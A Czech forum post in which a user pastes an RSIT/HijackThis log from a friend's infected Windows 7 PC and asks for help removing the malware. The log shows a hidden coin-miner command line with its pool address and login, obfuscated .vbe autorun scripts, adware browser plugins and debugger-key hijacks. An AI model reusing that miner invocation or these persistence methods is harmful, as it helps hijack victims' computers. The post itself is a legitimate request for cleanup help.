Odvirování PC, zrychlení počítače, vzdálená pomoc prostřednictvím služby neslape.cz

Kámošův pc - havěť

Máte problém s virem? Vložte sem log z FRST nebo RSIT.

Moderátor: Moderátoři

Pravidla fóra
Pokud chcete pomoc, vložte log z FRST [návod zde] nebo RSIT [návod zde]

Jednotlivé thready budou po vyřešení uzamčeny. Stejně tak ty, které budou nečinné déle než 14 dní. Vizte Pravidlo o zamykání témat. Děkujeme za pochopení.

!NOVINKA!
Nově lze využívat služby vzdálené pomoci, kdy se k vašemu počítači připojí odborník a bližší informace o problému si od vás získá telefonicky! Více na www.neslape.cz
Odpovědět
Zpráva
Autor
neumimvymysletjmeno
2. Stupeň Varování
Příspěvky: 91
Registrován: 23 čer 2014 12:59

Kámošův pc - havěť

#1 Příspěvek od neumimvymysletjmeno »

log rsit:

Logfile of random's system information tool 1.08 (written by random/random)
Run by Roland at 2014-07-23 09:51:03
Microsoft Windows 7 Home Premium Service Pack 1
System drive C: has 51 GB (43%) free of 120 GB
Total RAM: 3949 MB (64% free)

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 9:51:10, on 23.7.2014
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.17126)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\RocketDock\RocketDock.exe
C:\Users\2014\AppData\Local\iLivid\iLivid.exe
C:\Users\2014\AppData\Roaming\uTorrent\uTorrent.exe
C:\Users\2014\AppData\Roaming\Seznam.cz\bin\szndesktop.exe
C:\Program Files (x86)\Luxand\Blink!\LuxandBlinkTray.exe
C:\Windows\inf\msqjxsas\msqjxsas.exe
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
C:\Program Files\trend micro\Roland.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://istart.webssearches.com/?type=hp ... XX6VE7YP58
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.cz/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://istart.webssearches.com/?type=hp ... XX6VE7YP58
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://istart.webssearches.com/web/?typ ... earchTerms}
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://istart.webssearches.com/web/?typ ... earchTerms}
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://istart.webssearches.com/?type=hp ... XX6VE7YP58
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: IETabPage Class - {3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C} - C:\Program Files (x86)\SupTab\SupTab.dll
O2 - BHO: CostMin - {56CF0896-99D3-C198-175B-52A3CE5DD65D} - C:\Program Files (x86)\CostMin\hG_.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~2\MICROS~1\Office14\GROOVEEX.DLL
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll
O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\MICROS~1\Office14\URLREDIR.DLL
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
O4 - HKLM\..\Run: [BCSSync] "C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
O4 - HKLM\..\Run: [mncgmakaiSrv] C:\Windows\system32\mncgmakai.vbe
O4 - HKLM\..\Run: [seznam-listicka-distribuce] "C:\Program Files (x86)\Seznam.cz\distribution\szninstall.exe" -s -d listicka 1 szn-software-listicka cz.seznam.software.autoupdate
O4 - HKLM\..\Run: [SafePCRepair EPM Support] "C:\PROGRA~2\SAFEPC~2\bar\1.bin\89medint.exe" T8EPMSUP.DLL,S
O4 - HKLM\..\Run: [SafePCRepair_89 Browser Plugin Loader 64] C:\PROGRA~2\SAFEPC~2\bar\1.bin\89brmon64.exe
O4 - HKLM\..\Run: [mncoalkfkSrv] C:\Windows\system32\mncoalkfk.vbe
O4 - HKLM\..\Run: [msrlkwSrv] C:\Windows\inf\msrlkw.vbe
O4 - HKLM\..\Run: [mnconuveSrv] C:\Windows\system32\mnconuve.vbe
O4 - HKLM\..\Run: [MSStp] C:\Windows\system32\msstp.vbe
O4 - HKLM\..\Run: [mncxfeaxpSrv] C:\Windows\inf\mncxfeaxp.vbe
O4 - HKLM\..\Run: [DApp] C:\Program Files\PCDApp\start.bat
O4 - HKLM\..\Run: [Luxand Blink!] C:\Program Files (x86)\Luxand\Blink!\LuxandBlinkTray.exe /s
O4 - HKCU\..\Run: [RocketDock] "C:\Program Files (x86)\RocketDock\RocketDock.exe"
O4 - HKCU\..\Run: [cz.seznam.software.autoupdate] "C:\Users\2014\AppData\Roaming\Seznam.cz\szninstall.exe" -c
O4 - HKCU\..\Run: [cz.seznam.software.szndesktop] "C:\Users\2014\AppData\Roaming\Seznam.cz\bin\wszndesktop.exe" -q
O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
O4 - HKCU\..\Run: [Newgen] C:\Program Files (x86)\UX Pack\Newgen\Newgen.exe -winstart
O4 - HKCU\..\Run: [iLivid] "C:\Users\2014\AppData\Local\iLivid\iLivid.exe" -autorun
O4 - HKCU\..\Run: [uTorrent] "C:\Users\2014\AppData\Roaming\uTorrent\uTorrent.exe" /MINIMIZED
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')
O8 - Extra context menu item: E&xportovat do aplikace Microsoft Excel - res://C:\PROGRA~2\MICROS~1\Office14\EXCEL.EXE/3000
O8 - Extra context menu item: Od&eslat do aplikace OneNote - res://C:\PROGRA~2\MICROS~1\Office14\ONBttnIE.dll/105
O9 - Extra button: Odeslat do aplikace OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: Od&eslat do aplikace OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra button: P&ropojené poznámky aplikace OneNote - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra 'Tools' menuitem: P&ropojené poznámky aplikace OneNote - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O18 - Filter hijack: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
O20 - AppInit_DLLs: C:\PROGRA~2\SupTab\SEARCH~1.DLL
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: IePlugin Services (IePluginServices) - Cherished Technololgy LIMITED - C:\ProgramData\IePluginServices\PluginService.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: KMService - Unknown owner - C:\Windows\system32\srvany.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: SafePCRepairService (SafePCRepair_89Service) - COMPANYVERS_NAME - C:\PROGRA~2\SAFEPC~2\bar\1.bin\89barsvc.exe
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: TeamViewer 9 (TeamViewer9) - TeamViewer GmbH - C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C:\Program Files (x86)\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
O23 - Service: Unsigned Themes (UnsignedThemes) - Unknown owner - C:\Windows\UnsignedThemesSvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: WindowsMangerProtect Service (WindowsMangerProtect) - Fuyu LIMITED - C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 9992 bytes

======Listing Processes======

\SystemRoot\System32\smss.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
wininit.exe
C:\Windows\system32\services.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
"C:\Program Files\Microsoft Security Client\MsMpEng.exe"
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\svchost.exe -k NetworkService
C:\ProgramData\IePluginServices\PluginService.exe -service
C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe -service
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\SysWOW64\srvany.exe
C:\PROGRA~2\SAFEPC~2\bar\1.bin\89barsvc.exe
"C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe"
"C:\Program Files (x86)\Common Files\Ulead Systems\DVD\ULCDRSvr.exe"
C:\Windows\KMService.exe
\??\C:\Windows\system32\conhost.exe "-4431885661654646021430739190-71669826630194799816805065941159121163-1744408942
C:\Windows\system32\svchost.exe -k bthsvcs
C:\Windows\system32\SearchIndexer.exe /Embedding
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\AUDIODG.EXE 0x63c
C:\Windows\system32\wbem\wmiprvse.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
winlogon.exe
"C:\Windows\system32\Dwm.exe"
C:\Windows\Explorer.EXE
"taskhost.exe"
"C:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
"C:\Program Files (x86)\RocketDock\RocketDock.exe"
"C:\Program Files\Windows Sidebar\sidebar.exe" /autoRun
"C:\Users\2014\AppData\Local\iLivid\iLivid.exe" -autorun
"C:\Users\2014\AppData\Roaming\uTorrent\uTorrent.exe" /MINIMIZED
szndesktop.exe default start
"C:\Program Files (x86)\SafePCRepair_89\bar\1.bin\89brmon64.exe"
"C:\Users\2014\AppData\Roaming\Seznam.cz\bin\listicka-x64.exe"
\??\C:\Windows\system32\conhost.exe "515027011-12112222591146962464-1346856201374866389-1946820941514045529-1310230402
"C:\Program Files (x86)\Luxand\Blink!\LuxandBlinkTray.exe" /s
C:\Windows\inf\msqjxsas\msqjxsas.exe -o stratum+tcp://mint.bitminter.com:3333 -u trinkrapek_chuck01 -p pioneer123
\??\C:\Windows\system32\conhost.exe "-266080885-10087146092043441403989307155-513990413-1503399894-338419596-1444293730
"C:\Program Files\Windows Media Player\wmpnetwk.exe"
"C:\Windows\system32\wuauclt.exe"
"C:\Program Files\Internet Explorer\iexplore.exe" http://istart.webssearches.com/?type=sc ... XX6VE7YP58
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2448 CREDAT:267521 /prefetch:2
"C:\Windows\system32\SearchFilterHost.exe" 0 512 516 524 65536 520
C:\Windows\system32\sppsvc.exe
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe24_ Global\UsGthrCtrlFltPipeMssGthrPipe24 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Users\2014\Desktop\RSITx64.exe"
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

======Scheduled tasks folder======

C:\Windows\tasks\Adobe Flash Player Updater.job
C:\Windows\tasks\AmiUpdXp.job

======Registry dump======

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{56CF0896-99D3-C198-175B-52A3CE5DD65D}]
CostMin - C:\Program Files (x86)\CostMin\hG_.x64.dll [2013-07-08 508928]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}]
Groove GFS Browser Helper - C:\PROGRA~1\MICROS~2\Office14\GROOVEEX.DLL [2013-12-19 6671064]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B4F3A835-0E21-4959-BA22-42B3008E02FF}]
Office Document Cache Handler - C:\PROGRA~1\MICROS~2\Office14\URLREDIR.DLL [2013-03-06 690392]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]
Adobe PDF Link Helper - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-09-23 60568]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}]
IETabPage Class - C:\Program Files (x86)\SupTab\SupTab.dll [2014-07-13 515464]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{56CF0896-99D3-C198-175B-52A3CE5DD65D}]
CostMin - C:\Program Files (x86)\CostMin\hG_.dll [2013-07-08 450048]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}]
Groove GFS Browser Helper - C:\PROGRA~2\MICROS~1\Office14\GROOVEEX.DLL [2013-12-19 4171480]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
Java(tm) Plug-In SSV Helper - C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2014-03-26 462760]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B4F3A835-0E21-4959-BA22-42B3008E02FF}]
Office Document Cache Handler - C:\PROGRA~2\MICROS~1\Office14\URLREDIR.DLL [2013-03-06 562904]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2014-03-26 171944]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"MSC"=C:\Program Files\Microsoft Security Client\msseces.exe [2014-03-11 1271072]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"RocketDock"=C:\Program Files (x86)\RocketDock\RocketDock.exe [2007-09-02 495616]
"cz.seznam.software.autoupdate"=C:\Users\2014\AppData\Roaming\Seznam.cz\szninstall.exe [2013-05-16 1062472]
"cz.seznam.software.szndesktop"=C:\Users\2014\AppData\Roaming\Seznam.cz\bin\wszndesktop.exe [2013-04-12 92664]
"Sidebar"=C:\Program Files\Windows Sidebar\sidebar.exe [2010-11-21 1475584]
"Newgen"=C:\Program Files (x86)\UX Pack\Newgen\Newgen.exe -winstart []
"iLivid"=C:\Users\2014\AppData\Local\iLivid\iLivid.exe [2014-05-25 7913472]
"uTorrent"=C:\Users\2014\AppData\Roaming\uTorrent\uTorrent.exe [2014-07-13 1331792]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe ARM]
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2012-09-23 926896]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ATKMEDIA]
C:\Program Files (x86)\ASUS\ATK Package\ATK Media\DMedia.exe [2010-01-05 170624]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ATKOSD2]
C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe [2010-02-04 7350912]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\BrowserChoice]
C:\Windows\System32\browserchoice.exe [2010-02-23 294912]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HControlUser]
C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\HControlUser.exe [2009-06-19 105016]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\NtVdmSrv]
C:\Windows\inf\ntvdm.vbe [2013-06-20 1219]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\StartCCC]
C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [2011-03-10 336384]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SunJavaUpdateSched]
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2013-07-02 254336]

[HKEY_LOCAL_MACHINE\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run]
"BCSSync"=C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [2012-11-05 89184]
"mncgmakaiSrv"=C:\Windows\system32\mncgmakai.vbe []
"seznam-listicka-distribuce"=C:\Program Files (x86)\Seznam.cz\distribution\szninstall.exe [2013-05-16 1062472]
"SafePCRepair EPM Support"=C:\PROGRA~2\SAFEPC~2\bar\1.bin\89medint.exe [2014-06-11 12872]
"SafePCRepair_89 Browser Plugin Loader 64"=C:\PROGRA~2\SAFEPC~2\bar\1.bin\89brmon64.exe [2014-06-11 71752]
"mncoalkfkSrv"=C:\Windows\system32\mncoalkfk.vbe []
"msrlkwSrv"=C:\Windows\inf\msrlkw.vbe [2013-08-27 1558]
"mnconuveSrv"=C:\Windows\system32\mnconuve.vbe []
"MSStp"=C:\Windows\system32\msstp.vbe []
"mncxfeaxpSrv"=C:\Windows\inf\mncxfeaxp.vbe [2014-01-19 1342]
"DApp"=C:\Program Files\PCDApp\start.bat []
"Luxand Blink!"=C:\Program Files (x86)\Luxand\Blink!\LuxandBlinkTray.exe [2012-02-07 7663936]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"="C:\PROGRA~2\SupTab\SEARCH~2.DLL"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED}

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{B5A7F190-DDA6-4420-B3BA-52453494E6CD}"=C:\PROGRA~1\MICROS~2\Office14\GROOVEEX.DLL [2013-12-19 6671064]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{B5A7F190-DDA6-4420-B3BA-52453494E6CD}"=C:\PROGRA~2\MICROS~1\Office14\GROOVEEX.DLL [2013-12-19 4171480]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
"SecurityProviders"=credssp.dll

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\UnsignedThemes]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\AFD]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\MsMpSvc]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\UnsignedThemes]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=5
"ConsentPromptBehaviorUser"=3
"EnableUIADesktopToggle"=0
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoActiveDesktop"=1
"NoActiveDesktopChanges"=1
"ForceActiveDesktopOn"=0

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
"Debugger="tasklist.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
"Debugger="tasklist.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
"Debugger="tasklist.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
"Debugger="tasklist.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
"Debugger="tasklist.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
"Debugger="tasklist.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
"Debugger="tasklist.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
"Debugger="tasklist.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
"Debugger="tasklist.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
"Debugger="tasklist.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
"Debugger="tasklist.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
"Debugger="tasklist.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
"Debugger="tasklist.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
"Debugger="tasklist.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
"Debugger="tasklist.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
"Debugger="tasklist.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
"Debugger="tasklist.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
"Debugger="tasklist.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
"Debugger="tasklist.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
"Debugger="tasklist.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
"Debugger="tasklist.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
"Debugger="tasklist.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
"Debugger="tasklist.exe

======File associations======

.js - edit - C:\Windows\System32\Notepad.exe %1
.js - open - C:\Windows\System32\WScript.exe "%1" %*

======List of files/folders created in the last 1 months======

2014-07-23 17:36:29 ----D---- C:\Program Files\FlatOut2
2014-07-23 09:51:03 ----D---- C:\rsit
2014-07-23 09:51:03 ----D---- C:\Program Files\trend micro
2014-07-23 09:03:32 ----D---- C:\Users\2014\AppData\Roaming\Luxand
2014-07-23 09:03:13 ----A---- C:\Windows\system32\LuxandCredentialProvider.dll
2014-07-23 09:03:13 ----A---- C:\Windows\system32\LuxandBlinkLib11.dll
2014-07-23 09:03:13 ----A---- C:\Windows\system32\LuxandBlinkLib1.dll
2014-07-23 09:03:10 ----D---- C:\Program Files (x86)\Luxand
2014-07-23 09:03:10 ----A---- C:\Windows\system32\LuxandBlink.dll
2014-07-22 21:22:10 ----SHD---- C:\Windows\SYSWOW64\AI_RecycleBin
